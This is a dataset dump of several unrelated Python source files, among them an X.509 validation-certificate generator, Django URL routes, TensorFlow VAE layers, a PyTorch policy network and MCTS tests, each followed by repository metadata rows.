for cc,i in enumerate(xid):
f=open(asm_code_path+'/'+i+'.asm')
ln = os.path.getsize(asm_code_path+'/'+i+'.asm') # length of file in bytes
width = int(ln**0.5)
rem = ln%width
a = array.array("B") # uint8 array
a.fromfile(f,ln-rem)
f.close()
a=np.array(a)
#im = Image.open('asmimage/'+i+'.png')
a.resize((2000,))
#im1 = im.resize((64,64),Image.ANTIALIAS); # for faster computation
#des = leargist.color_gist(im1)
X[cc] = a#[0,:1000] #des[0:320]
print cc*1.0/len(xid)
pickle.dump(X,open('Xcode_'+train_or_test+'.p','w'))
| 29.576923 | 78 | 0.63329 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.305592 |
e2c91d72449fad349a8ca2ab17e151f78840d950 | 1,961 | py | Python | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | x509_3_validation_certs.py | askpatrickw/azure_iot_x509_helpers | 2bb9f1722f8e018786fcc05589adf40f7597bfab | [
"Unlicense"
] | null | null | null | """
Generate Validation Certificate bases on Azure IoT Hub Verification Code
Based on sample code from the cryptography library docs:
https://cryptography.io/en/latest/x509/tutorial/#creating-a-self-signed-certificate
"""
import datetime
from pathlib import Path
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography import x509
from cryptography.x509.oid import NameOID
from config import AZURE_IOT_VERIFICATION_CODE, COMPANY_INFO, PASSPHRASE, PATH_TO_CERTS, VALID_DAYS
for key_name in PASSPHRASE.keys():
pem_data = open(f"{PATH_TO_CERTS}{key_name}/key.pem", "rb").read()
key = serialization.load_pem_private_key(pem_data, PASSPHRASE[key_name])
issuer = x509.Name(
[
x509.NameAttribute(NameOID.COUNTRY_NAME, COMPANY_INFO['COUNTRY']),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, COMPANY_INFO['STATE']),
x509.NameAttribute(NameOID.LOCALITY_NAME, COMPANY_INFO['CITY']),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, COMPANY_INFO['NAME']),
]
)
subject = x509.Name(
[x509.NameAttribute(NameOID.COMMON_NAME, AZURE_IOT_VERIFICATION_CODE[key_name]),]
)
cert = (
x509.CertificateBuilder()
.subject_name(subject)
.issuer_name(issuer)
.public_key(key.public_key())
.serial_number(x509.random_serial_number())
.not_valid_before(datetime.datetime.utcnow())
.not_valid_after(
datetime.datetime.utcnow()
+ datetime.timedelta(days=VALID_DAYS)
)
.sign(key, hashes.SHA256())
)
path = Path(f"{PATH_TO_CERTS}{key_name}")
path.mkdir(parents=True, exist_ok=True)
filename = f"{path}/validation_certificate.pem"
with open(filename, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
print(f"{key_name.capitalize()} Validation Cert: {filename}")
| 36.314815 | 99 | 0.704233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 420 | 0.214176 |
e2c9a924fe0897e10007fced991eb0673d76230d | 1,307 | py | Python | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | PuThresholdTuning/python/akPu4PFJetSequence10_cff.py | mverwe/JetRecoValidation | ee8b3fd94bac16390b367dc5030489738ff67958 | [
"CC0-1.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
from HeavyIonsAnalysis.JetAnalysis.jets.akPu4PFJetSequence_PbPb_mc_cff import *
#PU jets with 10 GeV threshold for subtraction
akPu4PFmatch10 = akPu4PFmatch.clone(src = cms.InputTag("akPu4PFJets10"))
akPu4PFparton10 = akPu4PFparton.clone(src = cms.InputTag("akPu4PFJets10"))
akPu4PFcorr10 = akPu4PFcorr.clone(src = cms.InputTag("akPu4PFJets10"))
akPu4PFpatJets10 = akPu4PFpatJets.clone(jetSource = cms.InputTag("akPu4PFJets10"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akPu4PFcorr10")),
genJetMatch = cms.InputTag("akPu4PFmatch10"),
genPartonMatch = cms.InputTag("akPu4PFparton10"),
)
akPu4PFJetAnalyzer10 = akPu4PFJetAnalyzer.clone(jetTag = cms.InputTag("akPu4PFpatJets10"), doSubEvent = cms.untracked.bool(True) )
akPu4PFJetSequence10 = cms.Sequence(akPu4PFmatch10
*
akPu4PFparton10
*
akPu4PFcorr10
*
akPu4PFpatJets10
*
akPu4PFJetAnalyzer10
)
| 52.28 | 130 | 0.561591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.131599 |
e2cb06b712c978cf2cdaaef7401e96574a50da51 | 2,796 | py | Python | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | annotationweb/urls.py | andreped/annotationweb | 80b0e96a4dbefdc39a83e6cf9ffb0b623cf417ee | [
"MIT"
] | null | null | null | from django.conf.urls import include
from django.urls import path
from django.contrib import admin
from . import views
app_name = 'annotationweb'
urlpatterns = [
path('', views.index, name='index'),
path('datasets/', views.datasets, name='datasets'),
path('add-image-sequence/<int:subject_id>/', views.add_image_sequence, name='add_image_sequence'),
path('show_frame/<int:image_sequence_id>/<int:frame_nr>/<int:task_id>/', views.show_frame, name='show_frame'),
path('new-dataset/', views.new_dataset, name='new_dataset'),
path('delete-dataset/<int:dataset_id>/', views.delete_dataset, name='delete_dataset'),
path('dataset-details/<int:dataset_id>/', views.dataset_details, name='dataset_details'),
path('new-subject/<int:dataset_id>/', views.new_subject, name='new_subject'),
path('delete-subject/<int:subject_id>/', views.delete_subject, name='delete_subject'),
path('subject-details/<int:subject_id>/', views.subject_details, name='subject_details'),
path('delete-sequence/<int:sequence_id>/', views.delete_sequence, name='delete_sequence'),
path('delete-task/<int:task_id>/', views.delete_task, name='delete_task'),
path('show-image/<int:image_id>/<int:task_id>/', views.show_image, name='show_image'),
path('new-task/', views.new_task, name='new_task'),
path('task/<int:task_id>/', views.task, name='task'),
path('reset-filters/<int:task_id>/', views.reset_filters, name='reset_filters'),
path('new-label/', views.new_label, name='new_label'),
path('task-description/<int:task_id>/', views.task_description, name='task_description'),
path('export/<int:task_id>/', views.export, name='export'),
path('export-options/<int:task_id>/<int:exporter_index>/', views.export_options, name='export_options'),
path('import/<int:dataset_id>/', views.import_data, name='import'),
path('import-options/<int:dataset_id>/<int:importer_index>/', views.import_options, name='import_options'),
path('annotate/<int:task_id>/', views.annotate_next_image, name='annotate'),
path('annotate/<int:task_id>/image/<int:image_id>/', views.annotate_image, name='annotate'),
path('select-key-frames/<int:task_id>/image/<int:image_id>/', views.select_key_frames, name='select_key_frames'),
path('admin/', admin.site.urls),
path('user/', include('user.urls')),
path('classification/', include('classification.urls')),
path('boundingbox/', include('boundingbox.urls')),
path('landmark/', include('landmark.urls')),
path('cardiac/', include('cardiac.urls')),
path('spline-segmentation/', include('spline_segmentation.urls'))
]
# This is for making statics in a development environment
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns += staticfiles_urlpatterns()
| 60.782609 | 117 | 0.718169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,391 | 0.497496 |
e2cb6ee5e64d50fb394883bc6a0cf789076e9e45 | 7,015 | py | Python | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | 2 | 2021-08-08T16:39:55.000Z | 2021-08-25T09:48:22.000Z | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | null | null | null | vae/decoder/vae_conv_util.py | VincentStimper/hmc-hyperparameter-tuning | a0464cd80000c7cd45a388d6a5f76c0f1a76104d | [
"MIT"
] | 1 | 2022-02-12T16:57:32.000Z | 2022-02-12T16:57:32.000Z | import numpy as np
import tensorflow as tf
def deconv_layer(output_shape, filter_shape, activation, strides, name):
scale = 1.0 / np.prod(filter_shape[:3])
seed = int(np.random.randint(0, 1000)) # 123
with tf.name_scope('conv_mnist/conv'):
W = tf.Variable(tf.random_uniform(filter_shape,
minval=-scale, maxval=scale,
dtype=tf.float32, seed=seed), name = name+ '_W')
b = tf.Variable(tf.zeros([filter_shape[-2]]), name=name + '_b') # use output channel
def apply(x):
output_shape_x = (x.get_shape().as_list()[0],) + output_shape
a = tf.nn.conv2d_transpose(x, W, output_shape_x, strides, 'SAME') + b
if activation == 'relu':
return tf.nn.relu(a)
if activation == 'sigmoid':
return tf.nn.sigmoid(a)
if activation == 'linear':
return a
return apply
def generator(dimH=500, dimZ=32, name='generator'):
# now construct a decoder
input_shape = (28, 28, 1)
filter_width = 5
decoder_input_shape = [(4, 4, 32), (7, 7, 32), (14, 14, 16)]
decoder_input_shape.append(input_shape)
fc_layers = [dimZ, dimH, int(np.prod(decoder_input_shape[0]))]
l = 0
# first include the MLP
mlp_layers = []
N_layers = len(fc_layers) - 1
for i in np.arange(0, N_layers):
name_layer = name + '_mlp_l%d' % l
mlp_layers.append(mlp_layer(fc_layers[i], fc_layers[i + 1], 'relu', name_layer))
l += 1
conv_layers = []
N_layers = len(decoder_input_shape) - 1
for i in np.arange(0, N_layers):
if i < N_layers - 1:
activation = 'relu'
else:
activation = 'linear'
name_layer = name + '_conv_l%d' % l
output_shape = decoder_input_shape[i + 1]
input_shape = decoder_input_shape[i]
up_height = int(np.ceil(output_shape[0] / float(input_shape[0])))
up_width = int(np.ceil(output_shape[1] / float(input_shape[1])))
strides = (1, up_height, up_width, 1)
filter_shape = (filter_width, filter_width, output_shape[-1], input_shape[-1])
conv_layers.append(deconv_layer(output_shape, filter_shape, activation, \
strides, name_layer))
l += 1
print('decoder architecture', fc_layers, 'reshape', decoder_input_shape)
def apply(z):
x = z
for layer in mlp_layers:
x = layer(x)
x = tf.reshape(x, (x.get_shape().as_list()[0],) + decoder_input_shape[0])
for layer in conv_layers:
x = layer(x)
return x
return apply
def init_weights(input_size, output_size, constant=1.0, seed=123):
""" Glorot and Bengio, 2010's initialization of network weights"""
scale = constant * np.sqrt(6.0 / (input_size + output_size))
if output_size > 0:
return tf.random_uniform((input_size, output_size),
minval=-scale, maxval=scale,
dtype=tf.float32, seed=seed)
else:
return tf.random_uniform([input_size],
minval=-scale, maxval=scale,
dtype=tf.float32, seed=seed)
def mlp_layer(d_in, d_out, activation, name):
with tf.name_scope('conv_mnist/mlp'):
W = tf.Variable(init_weights(d_in, d_out), name=name + '_W')
b = tf.Variable(tf.zeros([d_out]), name=name + '_b')
def apply_layer(x):
a = tf.matmul(x, W) + b
if activation == 'relu':
return tf.nn.relu(a)
if activation == 'sigmoid':
return tf.nn.sigmoid(a)
if activation == 'linear':
return a
return apply_layer
def get_parameters():
return tf.trainable_variables('conv_mnist')
################################## Conv Encoder ##############################
def conv_layer(filter_shape, activation, strides, name):
scale = 1.0 / np.prod(filter_shape[:3])
seed = int(np.random.randint(0, 1000)) # 123
W = tf.Variable(tf.random_uniform(filter_shape,
minval=-scale, maxval=scale,
dtype=tf.float32, seed=seed), name=name + '_W')
b = tf.Variable(tf.zeros([filter_shape[-1]]), name=name + '_b')
def apply(x):
a = tf.nn.conv2d(x, W, strides, 'SAME') + b
if activation == 'relu':
return tf.nn.relu(a)
if activation == 'sigmoid':
return tf.nn.sigmoid(a)
if activation == 'linear':
return a
return apply
def construct_filter_shapes(layer_channels, filter_width=5):
filter_shapes = []
for n_channel in layer_channels:
shape = (n_channel, filter_width, filter_width)
filter_shapes.append(shape)
return filter_shapes
def encoder_convnet(input_shape, dimH=500, dimZ=32, name='conv_encoder'):
# encoder for z (low res)
layer_channels = [input_shape[-1], 16, 32, 32]
filter_width = 5
fc_layer_sizes = [dimH]
conv_layers = []
N_layers = len(layer_channels) - 1
strides = (1, 2, 2, 1)
activation = 'relu'
l = 0
print_shapes = []
for i in range(N_layers):
name_layer = name + '_conv_l%d' % l
filter_shape = (filter_width, filter_width, layer_channels[i], layer_channels[i + 1])
print_shapes.append(filter_shape)
conv_layers.append(conv_layer(filter_shape, activation, strides, name_layer))
l += 1
# fc_layer = [int(np.prod(filter_shape)), dimH, dimZ * 2]
fc_layer = [512, dimH, dimZ*2]
print(fc_layer)
enc_mlp = []
for i in range(len(fc_layer) - 1):
if i + 2 < len(fc_layer):
activation = 'relu'
else:
activation = 'linear'
name_layer = name + '_mlp_l%d' % l
enc_mlp.append(mlp_layer2(fc_layer[i], fc_layer[i + 1], activation, name_layer))
print(fc_layer[i], fc_layer[i + 1])
l += 1
print('encoder architecture', print_shapes, 'reshape', fc_layer)
def apply(x):
out = x
for layer in conv_layers:
out = layer(out)
print(out)
out = tf.reshape(out, (out.get_shape().as_list()[0], -1))
print(out)
for layer in enc_mlp:
out = layer(out)
mu, log_sig = tf.split(out, 2, axis=1)
return mu, log_sig
return apply
def mlp_layer2(d_in, d_out, activation, name):
with tf.name_scope('conv_mnist/mlp2'):
W = tf.Variable(init_weights(d_in, d_out), name=name + '_W')
b = tf.Variable(tf.zeros([d_out]), name=name + '_b')
def apply_layer(x):
a = tf.matmul(x, W) + b
if activation == 'relu':
return tf.nn.relu(a)
if activation == 'sigmoid':
return tf.nn.sigmoid(a)
if activation == 'linear':
return a
return apply_layer
def sample_gaussian(mu, log_sig):
return mu + tf.exp(log_sig) * tf.random_normal(mu.get_shape())
| 34.053398 | 93 | 0.573913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.095652 |
e2cba6d54f96928921ab9588923d5e1065f14279 | 2,237 | py | Python | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | 2 | 2020-01-04T08:49:30.000Z | 2020-05-20T09:43:59.000Z | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | null | null | null | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | null | null | null | import torch.nn as nn, torch.nn.functional as F, torch.distributions as D, torch.nn.init as init
from basalganglia.reinforce.util.torch_util import *
class PolicyNetwork(nn.Module):
def __init__(self, env, hidden_layer_width=128, init_log_sigma=0, min_log_sigma=-3):
super(PolicyNetwork, self).__init__()
self.state_space, self.action_space = env.env.observation_space, env.env.action_space
self.init_log_sigma, self.min_log_sigma = init_log_sigma, min_log_sigma
if type(self.state_space) is Discrete:
self.input_layer = nn.Embedding(self.state_space.n, hidden_layer_width)
elif type(self.state_space) is Box:
self.input_layer = nn.Linear(self.state_space.shape[0], hidden_layer_width)
else:
raise NotImplementedError
self.fc_layer = nn.Linear(hidden_layer_width, hidden_layer_width)
if type(self.action_space) is Discrete:
self.logit = nn.Linear(hidden_layer_width, self.action_space.n)
elif type(self.action_space) is Box:
self.action_min, self.action_max = env.env.action_space.low, env.env.action_space.high
self.mean = nn.Linear(hidden_layer_width, self.action_space.shape[0])
self.log_sigma = nn.Parameter(torch.ones(self.action_space.shape[0])*self.init_log_sigma)
init.zeros_(self.mean.weight)
else:
raise NotImplementedError
def forward(self, s, detach=False):
x = self.input_layer(s)
x = torch.tanh(x)
x = self.fc_layer(x)
x = torch.tanh(x)
if type(self.action_space) is Discrete:
p = self.logit(x)
if detach:
p = p.detach()
d = D.Categorical(logits=p)
return d
elif type(self.action_space) is Box:
mu = self.mean(x)
sigma = torch.exp(self.log_sigma) # do softplus?
if detach:
mu, sigma = mu.detach(), sigma.detach()
d = D.MultivariateNormal(mu, torch.diag(sigma))
return d
def policy(self, s):
state = torchify([s], type(self.state_space))
action = self.forward(state).sample()
return action.numpy()[0]
| 40.672727 | 101 | 0.634332 | 2,083 | 0.931158 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.006258 |
e2cc20474c2caa1bc3247bfe362cc69c7776aa35 | 4,894 | py | Python | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 8 | 2019-11-01T19:14:36.000Z | 2021-08-18T17:55:43.000Z | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 12 | 2019-10-01T06:06:48.000Z | 2020-04-29T23:05:58.000Z | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 3 | 2018-04-03T01:29:21.000Z | 2019-06-27T02:52:34.000Z | from displayarray.frame.frame_publishing import pub_cam_loop_opencv, pub_cam_thread
import displayarray
import mock
import pytest
import cv2
from displayarray.frame.np_to_opencv import NpCam
import numpy as np
import displayarray.frame.subscriber_dictionary as subd
import displayarray.frame.frame_publishing as fpub
def test_pub_cam_loop_exit():
not_a_camera = mock.MagicMock()
with pytest.raises(TypeError):
pub_cam_loop_opencv(not_a_camera)
def test_pub_cam_int():
img = np.zeros((30, 40))
with mock.patch.object(
cv2, "VideoCapture", new_callable=mock.MagicMock
) as mock_cv_capture, mock.patch.object(NpCam, "set"), mock.patch.object(
NpCam, "get"
) as mock_get, mock.patch.object(
NpCam, "release"
), mock.patch.object(
displayarray.frame.frame_publishing.subscriber_dictionary, "register_cam"
) as reg_cam, mock.patch.object(
displayarray.frame.frame_publishing.subscriber_dictionary, "cam_cmd_sub"
) as cam_cmd_sub:
cap = NpCam(img)
mock_cv_capture.return_value = cap
mock_sub = cam_cmd_sub.return_value = mock.MagicMock()
mock_sub.get = mock.MagicMock()
mock_sub.get.side_effect = ["", "", "", "quit"]
mock_sub.release = mock.MagicMock()
mock_get.return_value = 2
cam_0 = subd.CV_CAMS_DICT["0"] = subd.Cam("0")
with mock.patch.object(cam_0.frame_pub, "publish") as cam_pub:
pub_cam_loop_opencv(0, mjpg=False)
cam_pub.assert_has_calls([mock.call(img)] * 4)
reg_cam.assert_called_once_with("0", cap)
cam_cmd_sub.assert_called_once_with("0")
cap.set.assert_has_calls(
[
mock.call(cv2.CAP_PROP_FRAME_WIDTH, -1),
mock.call(cv2.CAP_PROP_FRAME_HEIGHT, -1),
]
)
cap.get.assert_has_calls([mock.call(cv2.CAP_PROP_FRAME_COUNT)] * 8)
mock_sub.get.assert_has_calls(
[mock.call(), mock.call(), mock.call(), mock.call()]
)
mock_sub.release.assert_called_once()
cap.release.assert_called_once()
subd.CV_CAMS_DICT = {}
def test_pub_cam_fail():
img = np.zeros((30, 40))
with mock.patch.object(
cv2, "VideoCapture", new_callable=mock.MagicMock
) as mock_cv_capture, mock.patch.object(
NpCam, "isOpened"
) as mock_is_open, mock.patch.object(
subd, "register_cam"
) as mock_reg:
cap = NpCam(img)
mock_cv_capture.side_effect = [cap]
mock_is_open.return_value = False
subd.CV_CAMS_DICT["0"] = subd.Cam("0")
with mock.patch.object(
subd.CV_CAMS_DICT["0"].status_pub, "publish"
) as mock_fail_pub:
pub_cam_loop_opencv(0, mjpg=False)
mock_fail_pub.assert_called_once_with("failed")
subd.CV_CAMS_DICT = {}
def test_pub_cam_high_speed():
img = np.zeros((30, 40))
with mock.patch.object(
cv2, "VideoCapture", new_callable=mock.MagicMock
) as mock_cv_capture, mock.patch.object(
NpCam, "isOpened"
) as mock_is_open, mock.patch.object(
NpCam, "set"
) as mock_cam_set:
cap = NpCam(img)
mock_cv_capture.side_effect = [cap]
mock_is_open.return_value = False
pub_cam_loop_opencv(0, request_size=(640, 480), mjpg=True)
mock_cam_set.assert_has_calls(
[
mock.call(cv2.CAP_PROP_FOURCC, cv2.CAP_OPENCV_MJPEG),
mock.call(cv2.CAP_PROP_FRAME_WIDTH, 640),
mock.call(cv2.CAP_PROP_FRAME_HEIGHT, 480),
]
)
def test_pub_cam_numpy():
with mock.patch(
"displayarray.frame.frame_publishing.uid_for_source",
new_callable=mock.MagicMock,
) as mock_uidfs, mock.patch.object(
NpCam, "read"
) as mock_np_read, mock.patch.object(
subd, "register_cam"
):
img = np.zeros((30, 40))
mock_np_read.side_effect = [
(True, img),
(True, img),
(True, img),
(False, None),
]
mock_uidfs.return_value = "0"
cam_0 = subd.CV_CAMS_DICT["0"] = subd.Cam("0")
with mock.patch.object(cam_0.frame_pub, "publish") as cam_pub:
pub_cam_loop_opencv(img)
cam_pub.assert_has_calls([mock.call(img)] * 3)
subd.CV_CAMS_DICT = {}
def test_pub_cam_thread():
with mock.patch(
"displayarray.frame.frame_publishing.threading.Thread",
new_callable=mock.MagicMock,
) as mock_thread:
thread_instance = mock_thread.return_value = mock.MagicMock()
pub_cam_thread(5)
mock_thread.assert_called_once_with(
target=fpub.pub_cam_loop_opencv, args=(5, (-1, -1), True, float("inf"))
)
thread_instance.start.assert_called_once()
| 32.410596 | 83 | 0.625868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 335 | 0.068451 |
e2cc67d619fea277f8b31087d0bb55dfe4a8d619 | 308 | py | Python | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | import random
a1 = str(input(' diga o nome do aluno 1 '))
a2 = str(input(' diga o nome do aluno 2 '))
a3 = str(input(' diga o nome do aluno 3 '))
a4 = str(input(' diga o nome do aluno 4 '))
lista = [a1, a2, a3, a4]
escolhido = random.choice(lista)
print('O aluno soteado é o aluno {}'.format(escolhido))
| 25.666667 | 55 | 0.646104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.436893 |
e2cd02aade65d0b6969f2b1d510da3c44e2f7198 | 563 | py | Python | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | 7 | 2019-12-20T12:37:37.000Z | 2021-12-15T08:42:10.000Z | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | null | null | null | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | 1 | 2021-12-15T08:44:55.000Z | 2021-12-15T08:44:55.000Z | # encoding:utf-8
import pika
import time
credentials = pika.PlainCredentials('guest', 'guest')
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='s1004.lab.org',
port=5672,
virtual_host='/',
credentials=credentials))
channel = connection.channel()
channel.exchange_declare(exchange='topic_logs', type='topic')
message = 'Hello, World!'
channel.basic_publish(exchange='topic_logs',
routing_key='topic.logs.info',
body=message)
print " [x] Sent %r" % (message,)
connection.close() | 24.478261 | 63 | 0.680284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 125 | 0.222025 |
e2cd268e8522aa01fa610bfaf6b0ddd0d937eb64 | 295 | py | Python | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | null | null | null | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | 2 | 2015-11-19T21:37:01.000Z | 2015-11-25T22:37:45.000Z | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | null | null | null | """
Created on Nov 1, 2015
@author: ionut
"""
import logging
DEBUG = False
LOG_LEVEL = logging.INFO
DSN = "dbname=photomap user=postgres password=pwd host=127.0.0.1 port=5432"
TEMPLATE_PATH = "templates"
STATIC_PATH = "static"
MEDIA_PATH = "/home/ionut/nginx/media"
SECRET = "some_secret"
| 15.526316 | 75 | 0.725424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.583051 |
e2cd8925067691083a53320bbc702cff13ae910f | 11,031 | py | Python | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 7 | 2020-04-30T15:44:56.000Z | 2021-04-07T18:37:21.000Z | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 84 | 2019-05-07T04:37:10.000Z | 2022-03-04T18:17:57.000Z | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 1 | 2021-04-07T18:37:25.000Z | 2021-04-07T18:37:25.000Z | import typing
from collections import Counter
import numpy as np
from pytest import approx
from zero_play.connect4.game import Connect4State
from zero_play.game_state import GameState
from zero_play.heuristic import Heuristic
from zero_play.mcts_player import SearchNode, MctsPlayer, SearchManager
from zero_play.playout import Playout
from zero_play.tictactoe.state import TicTacToeState
class FirstChoiceHeuristic(Heuristic):
def get_summary(self) -> typing.Sequence[str]:
return 'first choice',
def analyse(self, board: GameState) -> typing.Tuple[float, np.ndarray]:
policy = self.get_policy(board)
player = board.get_active_player()
if board.is_win(player):
value = 1.0
elif board.is_win(-player):
value = -1.0
else:
value = 0.0
return value, policy
def get_policy(self, board: GameState):
valid_moves = board.get_valid_moves()
if valid_moves.any():
first_valid = np.nonzero(valid_moves)[0][0]
else:
first_valid = 0
policy = np.zeros_like(valid_moves)
policy[first_valid] = 1.0
return policy
class EarlyChoiceHeuristic(FirstChoiceHeuristic):
""" Thinks each move is 90% as good as the previous option. """
def get_summary(self) -> typing.Sequence[str]:
return 'early choice',
def get_policy(self, board: GameState):
valid_moves = board.get_valid_moves()
if not valid_moves.any():
valid_moves = (valid_moves == 0)
raw_policy = np.multiply(valid_moves, 0.9 ** np.arange(len(valid_moves)))
policy = raw_policy / raw_policy.sum()
return policy
def test_repr():
board_text = """\
.O.
.X.
...
"""
board = TicTacToeState(board_text)
expected_repr = "SearchNode(TicTacToeState(spaces=array([[0, -1, 0], [0, 1, 0], [0, 0, 0]])))"
node = SearchNode(board)
node_repr = repr(node)
assert node_repr == expected_repr
def test_eq():
board1 = TicTacToeState()
board2 = TicTacToeState()
board3 = TicTacToeState("""\
...
.X.
...
""")
node1 = SearchNode(board1)
node2 = SearchNode(board2)
node3 = SearchNode(board3)
assert node1 == node2
assert node1 != node3
assert node1 != 42
def test_default_board():
expected_board = TicTacToeState()
expected_node = SearchNode(expected_board)
node = SearchNode(expected_board)
assert expected_node == node
def test_select_leaf_self():
game = TicTacToeState()
node = SearchNode(game)
expected_leaf = node
leaf = node.select_leaf()
assert expected_leaf == leaf
def test_select_first_child():
start_state = TicTacToeState()
expected_leaf_board = start_state.make_move(0)
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
node.record_value(1)
leaf = node.select_leaf()
assert leaf == expected_leaf
assert node.average_value == -1.0
def test_select_second_child():
start_state = TicTacToeState()
expected_leaf_board = start_state.make_move(1)
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
node.select_leaf().record_value(0)
node.select_leaf().record_value(0)
leaf = node.select_leaf()
assert leaf == expected_leaf
assert node.average_value == 0
def test_select_grandchild():
start_state = TicTacToeState()
expected_leaf_board = TicTacToeState("""\
XO.
...
...
""")
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
for _ in range(10):
node.select_leaf().record_value(0)
leaf = node.select_leaf()
assert leaf == expected_leaf
def test_select_good_grandchild():
start_state = TicTacToeState()
node = SearchNode(start_state)
node.select_leaf().record_value(0) # Root node returns itself.
node.select_leaf().record_value(0) # Move 0 AT 1A, value is a tie.
node.select_leaf().record_value(-1) # Move 1 AT 1B, value is a win.
# Expect it to exploit the win at 1B, and try the first grandchild at 1A.
expected_leaf_board = TicTacToeState("""\
ABC
1 OX.
2 ...
3 ...
""")
expected_leaf = SearchNode(expected_leaf_board)
leaf = node.select_leaf()
assert leaf == expected_leaf
def test_select_no_children():
start_board = TicTacToeState("""\
XOX
OOX
.XO
""")
expected_leaf_board = TicTacToeState("""\
XOX
OOX
XXO
""")
expected_leaf = SearchNode(expected_leaf_board)
start_node = SearchNode(start_board)
leaf1 = start_node.select_leaf()
leaf1.record_value(1)
leaf2 = start_node.select_leaf()
leaf2.record_value(1)
leaf3 = start_node.select_leaf()
assert leaf1 == start_node
assert leaf2 == expected_leaf
assert leaf3 == expected_leaf
def test_choose_move():
np.random.seed(0)
start_state = Connect4State()
state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
expected_display = """\
.......
.......
.......
..XXX..
OXOXO..
XOXOXOO
"""
player = MctsPlayer(start_state, iteration_count=200)
move = player.choose_move(state1)
state2 = state1.make_move(move)
display = state2.display()
assert display == expected_display
def test_choose_move_in_pool():
start_state = Connect4State()
state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
player = MctsPlayer(start_state, iteration_count=200, process_count=2)
valid_moves = start_state.get_valid_moves()
move = player.choose_move(state1)
# Can't rely on which move, because other process has separate random seed.
assert valid_moves[move]
